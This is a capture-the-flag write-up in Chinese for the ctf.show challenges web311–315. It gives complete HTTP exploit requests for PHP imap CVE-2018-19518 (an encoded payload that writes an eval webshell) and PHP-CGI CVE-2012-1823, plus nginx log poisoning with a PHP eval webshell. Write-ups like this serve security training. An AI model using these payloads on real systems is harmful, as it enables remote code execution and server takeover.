web311
PHP-fpm 远程代码执行漏洞(CVE-2019-11043),使用这个工具就可以命令执行啦。这就是 PWN 👴的世界吗?i了i了
web312
PHP imap 远程命令执行漏洞(CVE-2018-19518)。
php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这个参数,最终将导致命令执行漏洞。
在服务器地址参数中注入 oProxyCommand 参数 rce。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| POST / HTTP/1.1
Host: d739c103-0c04-441f-9476-20b843dc5692.challenge.ctf.show
Content-Length: 180
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://d739c103-0c04-441f-9476-20b843dc5692.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://d739c103-0c04-441f-9476-20b843dc5692.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=18055a59ade621-0332e63e4c56e2-9771539-240000-18055a59adf528; __e_inc=1
Connection: close
hostname=x+-oProxyCommand%3decho%09ZWNobyAiUEQ5d2FIQWdRR1YyWVd3b0pGOVFUMU5VV3pGZEtUc2ciIHwgYmFzZTY0IC1kID4vdmFyL3d3dy9odG1sL3NoZWwucGhw|base64%09-d|sh}&username=aaaa&password=aaaaa
|
注:包括在 x+-oProxyCommand%3decho%09编码后的内容|base64%09-d|sh} 之间的 base64 编码内容不能有 + =,这里踩了坑。
访问 shel.php 执行 env 获取 flag。
web313
PHP-CGI远程代码执行漏洞(CVE-2012-1823),构造复现即可,这 flag 挺能藏啊。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
| POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1
Host: 1b3f5512-7681-44c4-98e2-3d8f96508bea.challenge.ctf.show
Content-Length: 44
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://1b3f5512-7681-44c4-98e2-3d8f96508bea.challenge.ctf.show
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://1b3f5512-7681-44c4-98e2-3d8f96508bea.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=18055a59ade621-0332e63e4c56e2-9771539-240000-18055a59adf528; __e_inc=1
Connection: close
<?php system('cat /somewhere/fla9.txt');
|
web314
日志包含。
1
2
3
4
5
6
7
8
9
10
11
12
| GET /?f=/var/log/nginx/access.log HTTP/1.1
Host: 89eeea9d-8f60-4ec2-8996-fcc3d4c1a46e.challenge.ctf.show
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36<?php @eval($_POST[1]); ?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://89eeea9d-8f60-4ec2-8996-fcc3d4c1a46e.challenge.ctf.show/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: UM_distinctid=18055a59ade621-0332e63e4c56e2-9771539-240000-18055a59adf528; __e_inc=1
Connection: close
|
web315
XDebug 远程调试漏洞(代码执行),ctfshow的环境复现失败,vulhub 也复现失败,:8080 的 phpinfo 打不开。